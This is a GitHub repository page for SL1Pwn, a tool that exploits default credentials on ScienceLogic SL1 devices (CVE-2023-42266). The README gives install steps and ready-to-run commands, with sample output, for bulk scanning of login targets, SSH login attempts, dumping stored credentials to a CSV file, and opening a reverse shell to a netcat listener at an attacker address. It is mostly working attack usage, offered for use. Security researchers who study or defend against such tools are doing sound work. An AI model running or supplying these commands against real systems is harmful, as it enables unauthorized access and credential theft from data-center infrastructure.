Skip to content

This tool utilizes default credentials to obtain a reverse shell, dump credentials, and login via HTTP and SSH (single or bulk) on ScienceLogic SL1 devices.

Notifications You must be signed in to change notification settings

3NailsInfoSec/SL1Pwn

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 
 
 

Repository files navigation

SL1Pwn - ScienceLogic SL1 Exploitation

This tool utilizes default credentials to obtain a reverse shell, dump credentials, and login via HTTP and SSH (single or bulk) on ScienceLogic SL1 devices. If default credentials are not correct, you can supply your own.

Recognized as CVE-2023-42266

Read:

Hacking the Heartbeat Monitor of a Data Center - ScienceLogic SL1

Install:

git clone https://github.com/3NailsInfoSec/SL1Pwn.git
cd SL1Pwn
pip3 install -r requirements.txt

Usage:

Login - Test login with default creds on port 443:

python3 sl1pwn.py -t 1.1.1.1

[+] UI Login Success! https://1.1.1.1:443
[+] API Login Success! https://1.1.1.1:443

SSH - Test ssh login with custom creds

python3 sl1pwn.py -t 1.1.1.1 -p 22 -user em7admin -pass admin123

[+] Possible SSH success 1.1.1.1:22

Shell - Pop shell on SL1 device (setup netcat listener first)

python3 sl1pwn.py -t 1.1.1.1 -shell -L 2.2.2.2 -P 4444

[+] UI Login Success! https://1.1.1.1:443
[+] API Login Success! https://1.1.1.1:443
[*] Created action with name: kjsKKe
[*] Created schedule successfully: 25
[*] Created automation successfully: 115

[+] Run book executed! Press enter when ready to clean up...

[*] Deleted action[121]: kjsKKe
[*] Deleted schedule[25]: kjsKKe
[*] Deleted automation[115]: kjsKKe

# nc -lvp 4444
Connection received on 1.1.1.1 45352
sh-4.2$

Dump - Dump all creds stored in SL1

python3 sl1pwn.py -t 1.1.1.1 -dump -o target_creds.csv

[*] Dumping 1.1.1.1::22 stored api credentials

[LifeSize: Endpoint SNMP]
[Cisco: CSP SNMP Port 161 Example]
[Cisco: CSP SNMP Port 1610 Exampl]
[Dell EMC: Isilon SNMPv2 Example]
[Cisco SNMPv3 - Example]
[Cisco SNMPv2 - Example]

[*] Saved to target_creds.csv

Scanning - Scan a combo IP:PORT list from a file

python3 sl1pwn.py -scan targets.txt -threads 25

[+] UI Login Success! https://1.1.1.1:443
[+] API Login Success! https://1.1.1.1:443
[+] UI Login Success! https://1.1.1.2:443
[+] API Login Success! https://1.1.1.2:443

Credits

Twitter: @sm00v

Github: @sm00v

About

This tool utilizes default credentials to obtain a reverse shell, dump credentials, and login via HTTP and SSH (single or bulk) on ScienceLogic SL1 devices.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages